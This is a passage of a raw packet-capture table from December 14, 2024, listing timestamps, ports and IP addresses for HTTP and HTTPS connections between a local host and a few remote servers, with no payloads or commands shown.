Dec 14, 2024 23:58:13.289484978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.289551973 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.289644957 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.289697886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.290672064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.290728092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.290837049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.290882111 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.291629076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.291681051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.291786909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.291991949 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.292655945 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.292769909 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.292815924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.292911053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.293709040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.293807983 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.293854952 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.293999910 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.294765949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.294877052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.294926882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.294974089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.295794010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.295851946 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.295950890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.296036005 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.296865940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.296926975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.297041893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.297103882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.297921896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.298080921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.298120975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.298193932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.298979998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.299038887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.299113989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.299237013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.300034046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.300133944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.300190926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.300273895 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.301176071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.301271915 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.301287889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.301354885 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.302148104 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.302189112 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.302301884 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.302347898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.303461075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.303505898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.303673029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.303724051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.304308891 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.304362059 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.304481983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.304672003 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.305373907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.305512905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.305537939 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.305569887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.306430101 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.306488037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.306572914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.306634903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.307473898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.307594061 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.307636023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.307681084 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.308543921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.308588028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.308703899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.308806896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.309577942 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.309649944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.309722900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.309784889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.310620070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.310672045 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.310755968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.310802937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.311706066 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.311758041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.311831951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.311925888 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.312746048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.312880039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.312896013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.313138962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.313832998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.313966036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.313967943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.314017057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.314850092 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.314939976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.315071106 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.315188885 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.316035986 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.316116095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.316167116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.316215038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.316983938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.317058086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.317199945 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.317509890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.318012953 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.318172932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.318216085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.318216085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.319200039 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.319319010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.319346905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.319366932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.320135117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.320282936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.320338964 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.320339918 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.321160078 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.321345091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.321393013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.321393013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.322261095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.322330952 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.322649956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.322689056 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.323288918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.323359966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.323661089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.323729038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.324336052 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.324419022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.324834108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.324884892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.325400114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.325483084 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.325551987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.325678110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.326473951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.326613903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.326639891 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.326901913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.327563047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.327687025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.327742100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.327785969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.328578949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.328742981 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.328747988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.328798056 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.329664946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.329713106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.329839945 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.329960108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.330666065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.330724955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.330807924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.330931902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.331784010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.331922054 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.331931114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.331995964 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.332788944 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.332875967 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.332947016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.333065987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.333786011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.334095955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.470882893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.471168995 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.471251965 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.471286058 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.471342087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.471541882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.472383022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.472444057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.472482920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.472543955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.473371983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.473541975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.473639965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.474504948 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.474597931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.474621058 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.474716902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.475476980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.475651979 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.475697041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.475697041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.476537943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.476653099 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.476694107 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.476748943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.477586985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.477742910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.477880955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.478657961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.478809118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.478826046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.478961945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.479720116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.479775906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.479871035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.480142117 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.480793953 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.480849981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.480904102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.480978012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.481792927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.481991053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.482076883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.482896090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.483035088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.483052015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.483196020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.483932972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.484055042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.484071016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.484193087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.484966040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.485122919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.485143900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.485186100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.486038923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.486195087 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.486248016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.487088919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.487231016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.487236023 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.487298012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.488137960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.488214970 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.488282919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.488332033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.489206076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.489276886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.489396095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.490256071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.490394115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.490439892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.490439892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.491307020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.491358995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.491444111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.491494894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.492345095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.492511034 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.492528915 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.492558002 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.493400097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.493577957 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.493628979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.494472980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.494569063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.494617939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.494719028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.495522976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.495596886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.495662928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.495716095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.496583939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.496670008 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.496728897 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.497051001 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.497653961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.497824907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.497874975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.498692989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.498796940 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.498843908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.499193907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.499914885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.500016928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.500035048 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.500080109 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.500803947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.500858068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.500963926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.501200914 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.501840115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.502006054 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.502186060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.502887011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.502952099 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.503029108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.503114939 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.503942013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.504112959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.504266977 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.505014896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.505155087 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.505176067 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.505234003 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.506099939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.506232977 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.506411076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.507114887 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.507169962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.507251978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.507350922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.508183956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.508343935 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.508388996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.508388996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.509354115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.509533882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.509588957 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.510288000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.510395050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.510452986 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.510509968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.511353016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.511449099 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.511533976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.511595011 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.512418985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.512475967 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.512564898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.512686014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.513433933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.513609886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.513679028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.514492035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.514628887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.514652967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.514704943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:13.515543938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:13.515678883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:15.801745892 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:15.802315950 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:15.922063112 CET	80	49764	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:15.922082901 CET	80	49786	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:15.922286987 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:15.922328949 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:15.922658920 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:16.042371988 CET	80	49786	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:16.682750940 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:16.682835102 CET	443	49787	104.21.51.88	192.168.2.4
